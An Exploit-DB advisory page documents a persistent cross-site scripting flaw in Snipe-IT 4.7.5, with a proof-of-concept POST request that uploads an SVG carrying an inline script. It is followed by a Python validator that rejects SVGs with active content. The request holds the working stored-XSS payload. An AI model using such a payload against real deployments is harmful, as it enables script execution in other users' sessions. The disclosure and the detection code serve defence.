Snipe-IT Open Source Asset Management 4.7.5 – Persistent Cross-Site Scripting

  • Author: Metin Yunus Kandemir
    Date: 2019-12-09
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/47756/
  • # Exploit Title: Snipe-IT Open Source Asset Management 4.7.5 - Persistent Cross-Site Scripting
    # Exploit Author: Metin Yunus Kandemir (kandemir)
    # Vendor Homepage: https://snipeitapp.com/
    # Software Link: https://github.com/snipe/snipe-it/releases/tag/v4.7.5
    # Version: 4.7.5
    # Category: Webapps
    # Tested on: Xampp for Windows
    
    # Description:
    # Snipe-IT v4.7.5 has a persistent cross-site scripting vulnerability via SVG file upload in the accessories section.
    # A malicious authorized user could potentially upload an SVG containing a JavaScript payload.
    
    # Steps to Reproduce:
    
    Upload a crafted SVG file in the request sent to create an accessory.
    Click the created accessory and copy the uploaded file's location.
    Browse to the uploaded SVG file's location in the browser.
    The alert box will open.
    
    # (PoC) POST Request:
    
    POST /accessories HTTP/1.1
    Host: target
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://target/accessories/create
    Content-Type: multipart/form-data; boundary=---------------------------6547029722068941066578895105
    Content-Length: 1761
    Cookie: XSRF-TOKEN=eyJpdiI6Ikh1TURMRnpyVDJsaVh4WUI5MWtQWnc9PSIsInZhbHVlIjoiUUNOcVErbFpcL0hGbmVveU9wYzZlOWRrVXNBbWxqeDBQZ3drbW4yZ2RXWU1POGlQQnVOeG5EcThxaUUraGdSYmlCMmNIc2VMMERxYnJOWDRBRUhmdEx3PT0iLCJtYWMiOiI2ZTg5YTA2MmUxZWRmM2RjYTNmNzI4YTE0YTQyOTQ4MGEzMDYyYWJiMDk5NGYwOWE4M2Y4ZTc4MWMxYzJhOGY1In0%3D; snipeitv4_session=KvsAzbhBKlUwbijPmLc86vCgO0PhG67J6EIIR0MD; laravel_token=eyJpdiI6InRTXC83Qmx0aDdVTE9EbVJzSnJ4V01nPT0iLCJ2YWx1ZSI6InVITklNQ3h3WldXMFIzY01Ob0Zqb1wvdm1NQTZXN3JuXC9Nc0g5Z0lpWXZCaTdiVHFOUVB4ZkpmQWRrVk1ZWVZFN1dZVnRrM3pRdjRCcWxySDRtd3hEWlIxd0h5QThUMDAyaVJcL0YzTmhFMlVlNzVFSG95S2VVYVBiRzNzNUtIOTkwdlBWUmQ1K3dTZHNNeXZJWVNmaWczb2hyOGFWRmI1a1NiNk84a1wvOW1tWXpleTMzSnRwYlowenBHSzN4dHRzd2lUTXd1b1dLNkluMEt2bWE0M1J4UTBaNGMzTGFQWEVOWnNyQk1aQk1nQ0tBejVjUU9XRnc5Q0l0citqSnJlbzgwTEVWQlN5ekdZa2hYckQ5T1ZKc2E2UT09IiwibWFjIjoiZDZhNWE2NjFmOTMwOWI0N2E2NjE3YTQwNWFlYjg0MmMyYTkwYzE1YTc4ZWI3N2U1ZWFjNGIyMzM4ZWU2NjczMyJ9
    Connection: close
    Upgrade-Insecure-Requests: 1
    
    .
    ..
    snip
    ..
    .
    
    Content-Disposition: form-data; name="image"; filename="test.svg"
    Content-Type: image/svg+xml
    
    <?xml version="1.0" standalone="no"?>
    <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
    <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
    <script type="text/javascript">
    alert(1);
    </script>
    </svg>
    
    -----------------------------6547029722068941066578895105--
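The defensive counterpart to the upload above is an allow-list check on SVG content before it is stored or served inline. The following is an added example written for this page, not code from Snipe-IT; it parses the SVG with Python's standard XML parser and rejects the `<script>` element used in the PoC, and goes slightly beyond the page by also flagging `on*` event-handler attributes, `foreignObject`, and `javascript:`/`data:` hrefs. The sample SVGs are constructed inline (the first reproduces the PoC payload from the request above).

```python
import xml.etree.ElementTree as ET
from typing import List

# Elements and URL schemes that carry active content inside an SVG.
ACTIVE_ELEMENTS = {"script", "foreignobject"}
SCRIPT_SCHEMES = ("javascript:", "data:")

# Constructed sample: the PoC SVG from the request above.
PAGE_POC_SVG = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(1);
</script>
</svg>
"""

# Constructed sample: a static shape with no active content.
BENIGN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><rect width="10" height="10" fill="#0099ff"/></svg>'


def _local(name: str) -> str:
    """Strip the '{namespace}' prefix ElementTree adds to tags/attributes, lowercased."""
    return name.rsplit("}", 1)[-1].lower()


def svg_findings(svg_bytes: bytes) -> List[str]:
    """Return the reasons an uploaded SVG must be rejected; empty list means clean.

    Unparseable input is reported as a finding so malformed uploads fail closed.
    (Python's expat does not fetch the external DTD referenced by the DOCTYPE.)
    """
    try:
        root = ET.fromstring(svg_bytes)
    except ET.ParseError as exc:
        return [f"unparseable XML: {exc}"]

    findings = []
    if _local(root.tag) != "svg":
        findings.append(f"root element is <{_local(root.tag)}>, not <svg>")
    for elem in root.iter():
        if not isinstance(elem.tag, str):  # skip comments/processing instructions
            continue
        tag = _local(elem.tag)
        if tag in ACTIVE_ELEMENTS:
            findings.append(f"active element <{tag}>")
        for attr, value in elem.attrib.items():
            name = _local(attr)
            if name.startswith("on"):
                findings.append(f"event handler attribute {name!r} on <{tag}>")
            # Collapse whitespace first: browsers ignore tabs/newlines inside the scheme.
            if name == "href" and "".join(value.split()).lower().startswith(SCRIPT_SCHEMES):
                findings.append(f"script-scheme href on <{tag}>")
    return findings


def is_safe_svg(svg_bytes: bytes) -> bool:
    return not svg_findings(svg_bytes)
```

Even with this check in place, serving user uploads from a separate origin or with `Content-Disposition: attachment` keeps any SVG that slips through from executing in the application's origin.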